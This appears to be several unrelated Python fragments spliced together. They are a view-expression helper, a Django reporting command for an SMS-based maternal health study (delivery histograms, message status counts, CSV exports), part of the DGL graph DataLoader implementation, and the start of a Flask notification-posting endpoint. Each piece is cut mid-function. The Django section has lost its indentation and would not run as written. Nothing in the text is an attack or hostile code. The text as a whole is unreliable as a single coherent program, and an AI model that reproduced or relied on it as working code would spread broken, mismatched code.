    def _freeze(expr):
        if not expr.is_frozen:
            expr._prefix = prefix

    return _do_recurse(val, _freeze)
def _do_apply_memo(val, old, new):
    # Replace the expression `old` with `new` wherever it appears
    # (by identity) within `val`, recursing into nested expressions
    def _substitute(expr):
        if expr is old:
            return new

        expr._expr = _do_apply_memo(expr._expr, old, new)
        return expr

    return _do_recurse(val, _substitute)
def _do_recurse(val, fcn):
if isinstance(val, ViewExpression):
| |
date - (id due_date delivery_date)')
for p in dd[:5]:
self.stdout.write( "\t{0.study_id} {0.due_date} {0.delivery_date} {0.study_group} (weeks {1:.0f})".format(
p, p.delta_days() / 7
) )
self.stdout.write( '\n')
# Add edd to dd delta seconds
dd_min , dd_max , dd_total , dd_count = None , None , 0 , dd.count()
dd_hist = [0 for _ in range(-10,11)]
for p in dd:
p.dd_delivery_delta = (p.delivery_date - p.due_date).total_seconds()
if dd_min is None or dd_min.dd_delivery_delta > p.dd_delivery_delta:
dd_min = p
if dd_max is None or dd_max.dd_delivery_delta < p.dd_delivery_delta:
dd_max = p
dd_total += p.dd_delivery_delta
dd_weeks = int(p.dd_delivery_delta / 604800) + 10
if dd_weeks < 0:
dd_weeks = 0
elif dd_weeks > 20:
dd_weeks = 20
dd_hist[dd_weeks] += 1
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
dd_min.study_id , dd_min.dd_delivery_delta/604800 ,
dd_max.study_id , dd_max.dd_delivery_delta/604800,
dd_total/(dd_count*604800)
) )
table = ""
for c in range(-10,11):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in dd_hist:
table += ' {:2.0f} '.format(c)
self.stdout.write(table)
# Add ANC Signup Week
ll = c_all.filter(study_group='two-way',delivery_date__isnull=False)
# ll = c_all.filter(delivery_date__isnull=False)
ll_min , ll_max , ll_total , ll_count = None , None , 0 , ll.count()
ll_hist = collections.Counter()
for p in ll:
p.ll_due_delta = (p.delivery_date - p.created.date()).days
if ll_min is None or ll_min.ll_due_delta > p.ll_due_delta:
ll_min = p
if ll_max is None or ll_max.ll_due_delta < p.ll_due_delta:
ll_max = p
ll_total += p.ll_due_delta
ll_hist[ p.ll_due_delta // 7 ] += 1
self.stdout.write( '\n\n **** Signup to EDD Delta ***' )
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
ll_min.study_id , ll_min.ll_due_delta // 7 ,
ll_max.study_id , ll_max.ll_due_delta // 7,
ll_total/(ll_count * 7)
) )
table = ""
for c in range( min(ll_hist), 43 ):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in range( min(ll_hist), 43):
table += ' {:2.0f} '.format(ll_hist[c])
self.stdout.write(table)
# Add delivery to loss delta (weeks)
ll = c_all.filter(loss_date__isnull=False)
ll_min , ll_max , ll_total , ll_count = None , None , 0 , ll.count()
ll_hist = collections.Counter()
for p in ll:
p.ll_notification_delta = p.delivery_notification_delta
if ll_min is None or ll_min.ll_notification_delta > p.ll_notification_delta:
ll_min = p
if ll_max is None or ll_max.ll_notification_delta < p.ll_notification_delta:
ll_max = p
ll_total += p.ll_notification_delta
ll_hist[ p.ll_notification_delta // 7 ] += 1
self.stdout.write( '\n\n **** Delivery to Loss Date ***' )
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
ll_min.study_id , ll_min.ll_notification_delta // 7 ,
ll_max.study_id , ll_max.ll_notification_delta // 7,
ll_total/(ll_count * 7)
) )
table = ""
for c in range( 0 , max(ll_hist.keys())+1 ):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in range( 0 , max(ll_hist.keys())+1 ):
table += ' {:2.0f} '.format(ll_hist[c])
self.stdout.write(table)
# Add stop date hist
ss = c_all.filter(statuschange__new='stopped')
ss_min , ss_max , ss_total , ss_count = None , None , 0 , ss.count()
ss_hist = collections.Counter()
for p in ss:
p.ss_notification_delta = p.stopped_study_delta
if ss_min is None or ss_min.ss_notification_delta > p.ss_notification_delta:
ss_min = p
if ss_max is None or ss_max.ss_notification_delta < p.ss_notification_delta:
ss_max = p
ss_total += p.ss_notification_delta
ss_hist[ p.ss_notification_delta // 28 * 4 ] += 1
self.stdout.write( '\n\n **** Study Start To Stop Weeks ***' )
self.stdout.write( 'Min {:s} (weeks {:.0f}) Max: {:s} (weeks {:.0f}) Average: {:f}'.format(
ss_min.study_id , ss_min.ss_notification_delta // 7 ,
ss_max.study_id , ss_max.ss_notification_delta // 7,
ss_total/(ss_count * 7)
) )
table = ""
for c in range( 0 , max(ss_hist.keys())+1, 4 ):
table += ' {:2.0f} '.format(c)
table += '\n' + '----'*21 + '\n'
for c in range( 0 , max(ss_hist.keys())+1, 4 ):
table += ' {:2.0f} '.format(ss_hist[c])
self.stdout.write(table)
self.print_delivery_source()
def print_delivery_source(self):
    """Print a per-facility table of participant delivery-source counts.

    Rows are facilities, with counts broken out by study group
    (control, one-way, two-way) inside each DeliverySourceItem; a final
    "Total" row sums all facilities.
    """
    self.print_header('Participant Delivery Source (control,one-way,two-way)')

    # Group delivered participants by facility/study group/delivery source.
    # The bare order_by() clears any default ordering so that values()
    # produces true GROUP BY semantics.
    source_groups = cont.Contact.objects_no_link.filter(
        delivery_date__isnull=False
    ).order_by().values(
        'facility', 'study_group', 'delivery_source'
    ).annotate(count=models.Count('delivery_source'))

    # Pivot the flat group counts into one DeliverySourceItem per facility
    source_counts = collections.defaultdict(DeliverySourceItem)
    for g in source_groups:
        source_counts[g['facility']][g['delivery_source']][g['study_group']] = g['count']

    # Print one row per facility, accumulating a totals row as we go
    self.stdout.write(DeliverySourceItem.header())
    total_row = DeliverySourceItem()
    for facility, row in source_counts.items():
        self.stdout.write(row.row_str(facility))
        total_row += row

    self.stdout.write(total_row.row_str("Total"))
def print_enrollment(self):
    """Print weekly enrollment counts per facility, plus a grand-total row."""
    self.print_header('Participant Enrollment By Week')
    c_all = cont.Contact.objects.all()
    # Ordered dict so weeks print in query (insertion) order.
    enrollment_counts = collections.OrderedDict()
    for c in c_all:
        # Bucket by year-week of the enrollment (creation) date.
        key = c.created.strftime('%Y-%U')
        try:
            enrollment_counts[key][c.facility] += 1
        except KeyError as e:
            # First contact seen for this week: start a fresh facility row.
            enrollment_counts[key] = FacilityRow()
            enrollment_counts[key][c.facility] += 1
    self.stdout.write( "{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}{:^12}".format(
        "Week","Ahero","Bondo","Mathare","Siaya","Rachuonyo","Riruta","Total") )
    total_row = FacilityRow()
    for week , enrollment in enrollment_counts.items():
        print week, enrollment, enrollment.total()
        total_row += enrollment
    print 'Total ' , total_row , total_row.total()
def print_success_times(self):
    """Print a histogram of message success times bucketed by wait interval.

    Next to each of the 13 interval rows, one of the top-13 participants by
    missed-message count is displayed.
    """
    self.print_header('Success Times')
    # Top 13 participants by missed messages -- one is shown per histogram row.
    participant_message_counts = cont.Contact.objects_no_link.annotate_messages().order_by('-msg_missed')[:13]
    def display_phone_number(num):
        # num runs 1..13 (one per interval row), so num-1 indexes the top-13 slice.
        participant = participant_message_counts[num-1]
        return " |\t{!r:<40} O: {:<3} D: {:<3} M: {:<3} I: {:<3}".format(
            participant,
            participant.msg_outgoing,
            participant.msg_delivered,
            participant.msg_missed,
            participant.msg_incoming
        )
    self.stdout.write('\n')
    # [label, upper bound in seconds]; each row counts messages whose
    # success_dt falls between the previous bound and this one.
    intervals = [
        ['',0],
        ['<10s',10],
        ['<30s',30],
        ['<1m',60],
        ['<5m',300],
        ['<10m',600],
        ['<30m',1800],
        ['<1h',3600],
        ['<2h',7200],
        ['<4h',14400],
        ['<8h',28800],
        ['<16h',57600],
        ['<24h',86400],
        ['>24h',604800]
    ]
    # Add success_dt and filter messages from start of collection: Nov 30, 2016
    messages = cont.Message.objects.exclude(external_status='Failed').add_success_dt()
    for i in range(1,len(intervals)):
        count = messages.filter(
            success_dt__range=(intervals[i-1][1],intervals[i][1])
        ).count()
        # Append the count to the interval row for later inspection.
        intervals[i].append(count)
        self.stdout.write( ' {:>8}: {:<4}{:>15}'.format(
            intervals[i][0],
            count,
            display_phone_number(i)
        ))
    # NOTE(review): treats messages.first() as the longest wait -- assumes the
    # queryset from add_success_dt() is ordered by descending success_dt; confirm.
    print "\tTotal (since Nov 30, 2016): {} Longest Wait: {} (h)".format(
        messages.filter(success_dt__isnull=False).count(),
        messages.first().success_dt/3600.0)
def print_sim_counts(self):
    """List participants who used more than one SIM, with per-connection stats."""
    self.print_header('SIM Counts')
    # Tally of multi-SIM participants per study group.
    counts = collections.defaultdict(int)
    for c in cont.Contact.objects_no_link.annotate_messages():
        if c.sim_count <= 1:
            continue
        counts[c.study_group] += 1
        print "{0.study_id} - {0.facility} - {0.study_group} - {1}: {0.msg_outgoing}-{0.msg_incoming}".format(c,c.created.date())
        for conn in c.connection_set.all():
            # NOTE(review): named first_message but fetched with .last() --
            # presumably the model's default ordering is newest-first, making
            # .last() the earliest message; confirm against the Message Meta.
            first_message = cont.Message.objects.filter(connection=conn).last()
            print "{} - {} {}: {}-{}".format(
                conn, conn.is_primary,
                first_message.created.date() if first_message is not None else None,
                cont.Message.objects.filter(connection=conn,is_outgoing=True).count(),
                cont.Message.objects.filter(connection=conn,is_outgoing=False).count(),
            )
        # Separator between participants.
        print '-'*40 , '\n'
    print counts
def print_message_status(self):
    """Print message counts grouped by external delivery status, plus failure reasons."""
    self.print_header('All Messages By Status')
    # Print message status
    print message_status_groups(delta=self.options['message_status'])
    print "Other Types"
    # Outgoing messages with a status other than the three common ones.
    status_groups = cont.Message.objects.order_by().values('external_status'). \
        exclude(external_status__in=('Success','Sent','Failed')).exclude(is_outgoing=False). \
        annotate(count=models.Count('external_status'))
    for group in status_groups:
        print "\t{0[external_status]:<30}: {0[count]}".format(group)
    print "\t{:<30}: {}".format("Total",sum( g['count'] for g in status_groups ) )
    print "\nFailed Reasons"
    reasons = collections.Counter()
    for msg in cont.Message.objects.filter(is_outgoing=True).exclude(external_status__in=('Success','Sent')):
        # Gateway metadata; a missing reason is tallied under 'No Reason'.
        reasons[msg.external_data.get('reason','No Reason')] += 1
    for reason , count in reasons.items():
        print "\t{:<20}: {}".format(reason,count)
    print "\t{:<20}: {}".format("Total",sum( reasons.values() ) )
def print_header(self, header):
    """Write *header* centered between two 30-dash rules.

    On every call after the first one a blank line is written first, so
    consecutive report sections are visually separated.
    """
    if self.printed:
        self.stdout.write("")
    self.printed = True
    rule = "-" * 30
    for line in (rule, "{:^30}".format(header), rule):
        self.stdout.write(line)
########################################
# SEC::Start CSV Functions
########################################
def make_connection_info_csv(self):
    ''' Basic csv dump of connection info '''
    # One row per phone connection belonging to an enrolled contact,
    # ordered by the contact's enrollment date.
    connections = cont.Connection.objects.filter(contact__isnull=False).order_by('contact__created')
    file_path = os.path.join(self.options['dir'],'connections.csv')
    csv_writer = csv.writer(open(file_path,'w'))
    csv_writer.writerow( ['id','created','sims','group','facility','primary',
        'first','last','total','participant','system','success','first_success','last_success'
    ])
    for conn in connections:
        total = conn.message_set.count()
        # NOTE(review): the 'first' column is filled with message_set.last()
        # and 'last' with .first() -- presumably the default message ordering
        # is newest-first; confirm, otherwise these two columns are swapped.
        row = [
            conn.contact.study_id,
            conn.contact.created.date(),
            conn.contact.sim_count,
            conn.contact.study_group,
            conn.contact.facility,
            1 if conn.is_primary is True else 0,
            conn.message_set.last().created.date() if total > 0 else '' ,
            conn.message_set.first().created.date() if total > 0 else '',
            total,
            conn.message_set.filter(is_outgoing=False).count(),
            conn.message_set.filter(is_system=True).exclude(translation_status='cust').count(),
            conn.message_set.filter(is_system=True,external_status='Success').exclude(translation_status='cust').count(),
            # Successes among the 5 earliest / 5 latest system messages.
            sum(1 for m in conn.message_set.filter(is_system=True).exclude(translation_status='cust').order_by('created')[:5] if m.external_status == 'Success'),
            sum(1 for m in conn.message_set.filter(is_system=True).exclude(translation_status='cust').order_by('-created')[:5] if m.external_status == 'Success'),
        ]
        csv_writer.writerow(row)
    return file_path
def make_sms_status_csv(self):
    ''' Weekly csv dump of message direction and delivery-status counts. '''
    file_path = os.path.join(self.options['dir'],'sms_status.csv')
    csv_writer = csv.writer(open(file_path,'w'))
    # Column order for the output; also the keys of each weekly counter row.
    status_keys = [
        'Nurse','Participant','System', 'Spam',
        'Success', 'Sent', 'Failed','None',
        'AbsentSubscriber',
        'UserDoesNotExist',
        'DeliveryFailure',
        'UserNotProvisioned',
        'SystemFailure',
        'Message Rejected By Gateway',
        'RejectedByGateway',
        'UserMTCallBarred',
        'GatewayError',
        'Rejected',
        'Could Not Send',
        'Unexpected Gateway Error',
        'UserBusyForMTSms',
    ]
    def get_default_row():
        # Fresh all-zero counter row for a new week.
        return {key:0 for key in status_keys}
    weeks = collections.defaultdict(get_default_row)
    def get_msg_week(msg):
        # Snap the message's date back to the start of its week
        # (isoweekday()%7 maps Sunday to 0).
        created = msg.created.date()
        return str(created - datetime.timedelta(days=created.isoweekday()%7))
    messages = cont.Message.objects.all().prefetch_related('contact')
    for msg in messages:
        week = weeks[get_msg_week(msg)]
        if msg.contact is None:
            # Message from an unknown number.
            week['Spam'] += 1
        elif msg.contact.study_group != 'two-way':
            # Only two-way participants are tallied beyond spam.
            continue
        elif msg.is_system:
            week['System'] += 1
            if msg.external_status in ['Success', 'Sent']:
                week[msg.external_status] += 1
            else:
                # Count both the generic failure and its specific reason.
                week['Failed'] += 1
                week[str(msg.reason)] += 1
        elif msg.is_outgoing:
            week['Nurse'] += 1
        else:
            week['Participant'] += 1
    # Write header row
    csv_writer.writerow( ['week'] + status_keys )
    # write all weeks
    for week in sorted(weeks.keys()):
        csv_writer.writerow([week] + [weeks[week][key] for key in status_keys])
    return file_path
def make_languages_csv(self):
    """Dump per-participant language preference and per-language message counts.

    Writes ``language_prefs.csv`` into the configured output directory via
    ``make_csv`` and returns the file path.
    """
    file_path = os.path.join(self.options['dir'], 'language_prefs.csv')
    # Fix: the original also did `csv.writer(open(file_path, 'w'))` here,
    # which truncated the file and leaked an unused handle -- make_csv()
    # below is what actually writes the file.
    contacts = cont.Contact.objects_no_link.annotate(
        msgs_sent=utils.sql_count_when(message__is_outgoing=False),
        msgs_system=utils.sql_count_when(message__is_system=True),
    ).order_by('facility', 'study_group', 'language', 'study_id')
    def add_stats(c):
        # Count, per contact, how many messages contain each language tag.
        c.msgs_english, c.msgs_swahili, c.msgs_luo, c.msgs_sheng = 0, 0, 0, 0
        for m in c.message_set.all():
            if 'english' in m.languages:
                c.msgs_english += 1
            if 'swahili' in m.languages:
                c.msgs_swahili += 1
            if 'luo' in m.languages:
                c.msgs_luo += 1
            if 'sheng' in m.languages:
                c.msgs_sheng += 1
        return c
    # Output columns: csv header -> attribute name on the contact.
    columns = collections.OrderedDict([
        ('study_id','study_id'),
        ('facility','facility'),
        ('study_group','study_group'),
        ('language','language'),
        ('msgs_sent','msgs_sent'),
        ('msgs_system','msgs_system'),
        ('msgs_english','msgs_english'),
        ('msgs_swahili','msgs_swahili'),
        ('msgs_luo','msgs_luo'),
        ('msgs_sheng','msgs_sheng'),
    ])
    make_csv(columns, [add_stats(c) for c in contacts], file_path)
    return file_path
def make_hiv_messaging_csv(self):
''' Basic csv dump of hiv messaging status '''
columns = collections.OrderedDict([
('study_id','study_id'),
('status','status'),
('hiv_messaging','hiv_messaging'),
('hiv_disclosed', null_boolean_factory('hiv_disclosed')),
| |
a single-GPU and
the whole graph fits in GPU memory.
* If the input graph :attr:`g` is on CPU while the output device :attr:`device` is GPU, then
depending on the value of :attr:`use_uva`:
- If :attr:`use_uva` is set to True, the sampling and subgraph construction will happen
on GPU even if the GPU itself cannot hold the entire graph. This is the recommended
setting unless there are operations not supporting UVA. :attr:`num_workers` must be 0
in this case.
- Otherwise, both the sampling and subgraph construction will take place on the CPU.
"""
def __init__(self, graph, indices, graph_sampler, device=None, use_ddp=False,
             ddp_seed=0, batch_size=1, drop_last=False, shuffle=False,
             use_prefetch_thread=None, use_alternate_streams=None,
             pin_prefetcher=None, use_uva=False,
             use_cpu_worker_affinity=False, cpu_worker_affinity_cores=None, **kwargs):
    """Validate arguments, resolve devices, and build the underlying
    ``torch.utils.data.DataLoader`` over a tensorized (or custom) indices
    dataset.

    Raises
    ------
    TypeError
        If ``graph`` is a :class:`DistGraph` (use the Dist* data loaders).
    ValueError
        On inconsistent device / ``num_workers`` / UVA combinations.
    AttributeError
        If a custom indices dataset has no ``device`` attribute.
    """
    # (BarclayII) PyTorch Lightning sometimes will recreate a DataLoader from an existing
    # DataLoader with modifications to the original arguments. The arguments are retrieved
    # from the attributes with the same name, and because we change certain arguments
    # when calling super().__init__() (e.g. batch_size attribute is None even if the
    # batch_size argument is not, so the next DataLoader's batch_size argument will be
    # None), we cannot reinitialize the DataLoader with attributes from the previous
    # DataLoader directly.
    # A workaround is to check whether "collate_fn" appears in kwargs. If "collate_fn"
    # is indeed in kwargs and it's already a CollateWrapper object, we can assume that
    # the arguments come from a previously created DGL DataLoader, and directly initialize
    # the new DataLoader from kwargs without any changes.
    if isinstance(kwargs.get('collate_fn', None), CollateWrapper):
        assert batch_size is None  # must be None
        # restore attributes
        self.graph = graph
        self.indices = indices
        self.graph_sampler = graph_sampler
        self.device = device
        self.use_ddp = use_ddp
        self.ddp_seed = ddp_seed
        self.shuffle = shuffle
        self.drop_last = drop_last
        self.use_prefetch_thread = use_prefetch_thread
        self.use_alternate_streams = use_alternate_streams
        self.pin_prefetcher = pin_prefetcher
        self.use_uva = use_uva
        kwargs['batch_size'] = None
        super().__init__(**kwargs)
        return

    if isinstance(graph, DistGraph):
        # Fix: error message previously said 'dgl.datalaoding' (typo).
        raise TypeError(
            'Please use dgl.dataloading.DistNodeDataLoader or '
            'dgl.dataloading.DistEdgeDataLoader for DistGraphs.')
    # (BarclayII) I hoped that pin_prefetcher can be merged into PyTorch's native
    # pin_memory argument. But our neighbor samplers and subgraph samplers
    # return indices, which could be CUDA tensors (e.g. during UVA sampling)
    # hence cannot be pinned. PyTorch's native pin memory thread does not ignore
    # CUDA tensors when pinning and will crash. To enable pin memory for prefetching
    # features and disable pin memory for sampler's return value, I had to use
    # a different argument. Of course I could change the meaning of pin_memory
    # to pinning prefetched features and disable pin memory for sampler's returns
    # no matter what, but I doubt if it's reasonable.
    self.graph = graph
    self.indices = indices  # For PyTorch-Lightning
    num_workers = kwargs.get('num_workers', 0)

    # Best-effort conversion of the indices to torch tensors so we can read
    # their device; custom datasets that cannot be converted are handled below.
    indices_device = None
    try:
        if isinstance(indices, Mapping):
            indices = {k: (torch.tensor(v) if not torch.is_tensor(v) else v)
                       for k, v in indices.items()}
            indices_device = next(iter(indices.values())).device
        else:
            indices = torch.tensor(indices) if not torch.is_tensor(indices) else indices
            indices_device = indices.device
    except Exception:  # pylint: disable=broad-except
        # Fix: was a bare `except:` (also caught KeyboardInterrupt/SystemExit).
        # ignore when it fails to convert to torch Tensors.
        pass

    if indices_device is None:
        if not hasattr(indices, 'device'):
            raise AttributeError(
                'Custom indices dataset requires a "device" '
                'attribute indicating where the indices is.')
        indices_device = indices.device

    if device is None:
        # Default the output device: current GPU for UVA, else the graph's device.
        if use_uva:
            device = torch.cuda.current_device()
        else:
            device = self.graph.device
    self.device = _get_device(device)

    # Sanity check - we only check for DGLGraphs.
    if isinstance(self.graph, DGLHeteroGraph):
        # Check graph and indices device as well as num_workers
        if use_uva:
            if self.graph.device.type != 'cpu':
                raise ValueError('Graph must be on CPU if UVA sampling is enabled.')
            if num_workers > 0:
                raise ValueError('num_workers must be 0 if UVA sampling is enabled.')
            # Create all the formats and pin the features - custom GraphStorages
            # will need to do that themselves.
            self.graph.create_formats_()
            self.graph.pin_memory_()
        else:
            if self.graph.device != indices_device:
                raise ValueError(
                    'Expect graph and indices to be on the same device. '
                    'If you wish to use UVA sampling, please set use_uva=True.')
            if self.graph.device.type == 'cuda' and num_workers > 0:
                raise ValueError('num_workers must be 0 if graph and indices are on CUDA.')
            if self.graph.device.type == 'cpu' and num_workers > 0:
                # Instantiate all the formats if the number of workers is greater than 0.
                self.graph.create_formats_()

        # Check pin_prefetcher and use_prefetch_thread - should be only effective
        # if performing CPU sampling but output device is CUDA
        if self.device.type == 'cuda' and self.graph.device.type == 'cpu' and not use_uva:
            if pin_prefetcher is None:
                pin_prefetcher = True
            if use_prefetch_thread is None:
                use_prefetch_thread = True
        else:
            if pin_prefetcher is True:
                raise ValueError(
                    'pin_prefetcher=True is only effective when device=cuda and '
                    'sampling is performed on CPU.')
            if pin_prefetcher is None:
                pin_prefetcher = False

            if use_prefetch_thread is True:
                raise ValueError(
                    'use_prefetch_thread=True is only effective when device=cuda and '
                    'sampling is performed on CPU.')
            if use_prefetch_thread is None:
                use_prefetch_thread = False

        # Check use_alternate_streams
        if use_alternate_streams is None:
            use_alternate_streams = (
                self.device.type == 'cuda' and self.graph.device.type == 'cpu' and
                not use_uva)

    # Wrap plain tensor indices in a tensorized dataset; anything else is
    # assumed to already be a dataset.
    if (torch.is_tensor(indices) or (
            isinstance(indices, Mapping) and
            all(torch.is_tensor(v) for v in indices.values()))):
        self.dataset = create_tensorized_dataset(
            indices, batch_size, drop_last, use_ddp, ddp_seed)
    else:
        self.dataset = indices

    self.ddp_seed = ddp_seed
    self.use_ddp = use_ddp
    self.use_uva = use_uva
    self.shuffle = shuffle
    self.drop_last = drop_last
    self.graph_sampler = graph_sampler
    self.use_alternate_streams = use_alternate_streams
    self.pin_prefetcher = pin_prefetcher
    self.use_prefetch_thread = use_prefetch_thread
    # Fix: pop (rather than get) the user-supplied worker_init_fn so it is
    # not passed to super().__init__() twice via **kwargs (TypeError:
    # duplicate keyword argument).
    worker_init_fn = WorkerInitWrapper(kwargs.pop('worker_init_fn', None))

    self.other_storages = {}

    if use_cpu_worker_affinity:
        nw_work = kwargs.get('num_workers', 0)
        if cpu_worker_affinity_cores is None:
            cpu_worker_affinity_cores = []
        if not isinstance(cpu_worker_affinity_cores, list):
            raise Exception('ERROR: cpu_worker_affinity_cores should be a list of cores')
        if not nw_work > 0:
            raise Exception('ERROR: affinity should be used with --num_workers=X')
        if len(cpu_worker_affinity_cores) not in [0, nw_work]:
            raise Exception('ERROR: cpu_affinity incorrect '
                            'settings for cores={} num_workers={}'
                            .format(cpu_worker_affinity_cores, nw_work))
        # Fall back to cores [0, num_workers) when no explicit list is given.
        self.cpu_cores = (cpu_worker_affinity_cores
                          if len(cpu_worker_affinity_cores)
                          else range(0, nw_work))
        worker_init_fn = WorkerInitWrapper(self.worker_init_function)

    super().__init__(
        self.dataset,
        collate_fn=CollateWrapper(
            self.graph_sampler.sample, graph, self.use_uva, self.device),
        batch_size=None,
        worker_init_fn=worker_init_fn,
        **kwargs)
def __iter__(self):
    """Return a prefetching iterator over the sampled minibatches."""
    if self.shuffle:
        self.dataset.shuffle()
    # When using multiprocessing PyTorch sometimes sets the number of PyTorch
    # threads to 1 when spawning new Python threads, which drastically slows
    # down pinning features -- remember the current thread count so the
    # prefetcher can use it.
    num_threads = None
    if self.num_workers > 0:
        num_threads = torch.get_num_threads()
    return _PrefetchingIter(
        self,
        super().__iter__(),
        use_thread=self.use_prefetch_thread,
        use_alternate_streams=self.use_alternate_streams,
        num_threads=num_threads)
def worker_init_function(self, worker_id):
    """Worker init default function.

    Pins dataloader worker *worker_id* to the CPU core configured at
    ``self.cpu_cores[worker_id]``.

    Parameters
    ----------
    worker_id : int
        Worker ID.

    Raises
    ------
    Exception
        If the affinity cannot be applied (e.g. invalid core ID or
        insufficient permissions); the original error is chained as the cause.
    """
    try:
        psutil.Process().cpu_affinity([self.cpu_cores[worker_id]])
        print('CPU-affinity worker {} has been assigned to core={}'
              .format(worker_id, self.cpu_cores[worker_id]))
    except Exception as exc:
        # Fix: was a bare `except:` which also caught KeyboardInterrupt /
        # SystemExit and discarded the underlying cause; chain it instead.
        raise Exception('ERROR: cannot use affinity id={} cpu_cores={}'
                        .format(worker_id, self.cpu_cores)) from exc
# To allow data other than node/edge data to be prefetched.
def attach_data(self, name, data):
    """Add a data other than node and edge features for prefetching.

    Parameters
    ----------
    name : str
        Key under which the extra storage is registered.
    data : object
        The data to register; it is passed through ``wrap_storage`` before
        being stored in ``self.other_storages``.
    """
    self.other_storages[name] = wrap_storage(data)
# Alias
class NodeDataLoader(DataLoader):
    """(DEPRECATED) Sampled graph data loader over a set of nodes.

    .. deprecated:: 0.8
        The class is deprecated since v0.8, replaced by
        :class:`~dgl.dataloading.DataLoader`. It is kept as a thin alias so
        existing code keeps working.
    """
class EdgeDataLoader(DataLoader):
    """(DEPRECATED) Sampled graph data loader over a set of edges.

    .. deprecated:: 0.8
        The class is deprecated since v0.8 -- its function has been covered by
        :class:`~dgl.dataloading.DataLoader` and
        :func:`~dgl.as_edge_prediction_sampler`.

    To migrate, change the legacy usage like:

    .. code:: python

       sampler = dgl.dataloading.MultiLayerNeighborSampler([15, 10, 5])
       dataloader = dgl.dataloading.EdgeDataLoader(
           g, train_eid, sampler, exclude='reverse_id',
           reverse_eids=reverse_eids,
           negative_sampler=dgl.dataloading.negative_sampler.Uniform(5),
           batch_size=1024, shuffle=True, drop_last=False, num_workers=4)

    to:

    .. code:: python

       sampler = dgl.dataloading.MultiLayerNeighborSampler([15, 10, 5])
       sampler = dgl.dataloading.as_edge_prediction_sampler(
           sampler, exclude='reverse_id',
           reverse_eids=reverse_eids,
           negative_sampler=dgl.dataloading.negative_sampler.Uniform(5))
       dataloader = dgl.dataloading.DataLoader(
           g, train_eid, sampler,
           batch_size=1024, shuffle=True, drop_last=False, num_workers=4)
    """
    def __init__(self, graph, indices, graph_sampler, device=None, use_ddp=False,
                 ddp_seed=0, batch_size=1, drop_last=False, shuffle=False,
                 use_prefetch_thread=False, use_alternate_streams=True,
                 pin_prefetcher=False,
                 exclude=None, reverse_eids=None, reverse_etypes=None, negative_sampler=None,
                 use_uva=False, **kwargs):
        if device is None:
            if use_uva:
                device = torch.cuda.current_device()
            else:
                # Fix: was `self.graph.device`, but `self.graph` is only set
                # by the base-class __init__ which has not run yet; use the
                # `graph` argument's device instead.
                device = graph.device
        device = _get_device(device)

        if isinstance(graph_sampler, BlockSampler):
            dgl_warning(
                'EdgeDataLoader directly taking a BlockSampler will be deprecated '
                'and it will not support feature prefetching. '
                'Please use dgl.dataloading.as_edge_prediction_sampler to wrap it.')
            if reverse_eids is not None:
                if use_uva:
                    # Move the reverse-edge mapping to the output device.
                    reverse_eids = recursive_apply(reverse_eids, lambda x: x.to(device))
                else:
                    reverse_eids_device = context_of(reverse_eids)
                    indices_device = context_of(indices)
                    if indices_device != reverse_eids_device:
                        raise ValueError('Expect the same device for indices and reverse_eids')
            graph_sampler = as_edge_prediction_sampler(
                graph_sampler, exclude=exclude, reverse_eids=reverse_eids,
                reverse_etypes=reverse_etypes, negative_sampler=negative_sampler)

        super().__init__(
            graph, indices, graph_sampler, device=device, use_ddp=use_ddp, ddp_seed=ddp_seed,
            batch_size=batch_size, drop_last=drop_last, shuffle=shuffle,
            use_prefetch_thread=use_prefetch_thread, use_alternate_streams=use_alternate_streams,
            pin_prefetcher=pin_prefetcher, use_uva=use_uva,
            **kwargs)
######## Graph DataLoaders ########
# GraphDataLoader loads a set of graphs so it's not relevant to the above. They | |
import base64
import csv
import functools
import uuid
from io import StringIO
import werkzeug
from flask import abort, current_app, jsonify, request
from notifications_utils.recipients import (
RecipientCSV,
try_validate_and_format_phone_number,
)
from app import (
api_user,
authenticated_service,
create_uuid,
document_download_client,
encryption,
notify_celery,
statsd_client,
)
from app.aws.s3 import upload_job_to_s3
from app.celery.letters_pdf_tasks import create_letters_pdf, process_virus_scan_passed
from app.celery.research_mode_tasks import create_fake_letter_response_file
from app.celery.tasks import process_job, save_email, save_sms
from app.clients.document_download import DocumentDownloadError
from app.config import QueueNames, TaskNames
from app.dao.jobs_dao import dao_create_job
from app.dao.notifications_dao import update_notification_status_by_reference
from app.dao.services_dao import fetch_todays_total_message_count
from app.dao.templates_dao import get_precompiled_letter_template
from app.letters.utils import upload_letter_pdf
from app.models import (
EMAIL_TYPE,
JOB_STATUS_PENDING,
JOB_STATUS_SCHEDULED,
KEY_TYPE_TEAM,
KEY_TYPE_TEST,
LETTER_TYPE,
NOTIFICATION_CREATED,
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING_VIRUS_CHECK,
NOTIFICATION_SENDING,
SMS_TYPE,
UPLOAD_DOCUMENT,
Notification,
)
from app.notifications.process_letter_notifications import create_letter_notification
from app.notifications.process_notifications import (
persist_notification,
persist_scheduled_notification,
send_notification_to_queue,
simulated_recipient,
)
from app.notifications.validators import (
check_rate_limiting,
check_service_can_schedule_notification,
check_service_email_reply_to_id,
check_service_has_permission,
check_service_sms_sender_id,
validate_and_format_recipient,
validate_template,
validate_template_exists,
)
from app.schema_validation import validate
from app.schemas import job_schema
from app.service.utils import safelisted_members
from app.v2.errors import BadRequestError
from app.v2.notifications import v2_notification_blueprint
from app.v2.notifications.create_response import (
create_post_email_response_from_notification,
create_post_letter_response_from_notification,
create_post_sms_response_from_notification,
)
from app.v2.notifications.notification_schemas import (
post_bulk_request,
post_email_request,
post_letter_request,
post_precompiled_letter_request,
post_sms_request,
)
@v2_notification_blueprint.route("/{}".format(LETTER_TYPE), methods=["POST"])
def post_precompiled_letter_notification():
    """Create a precompiled letter notification from posted PDF content."""
    body = request.get_json() or {}
    if "content" not in body:
        # No precompiled PDF attached: handle as a regular letter post.
        return post_notification(LETTER_TYPE)

    form = validate(request.get_json(), post_precompiled_letter_request)

    # Check permission to send letters
    check_service_has_permission(LETTER_TYPE, authenticated_service.permissions)
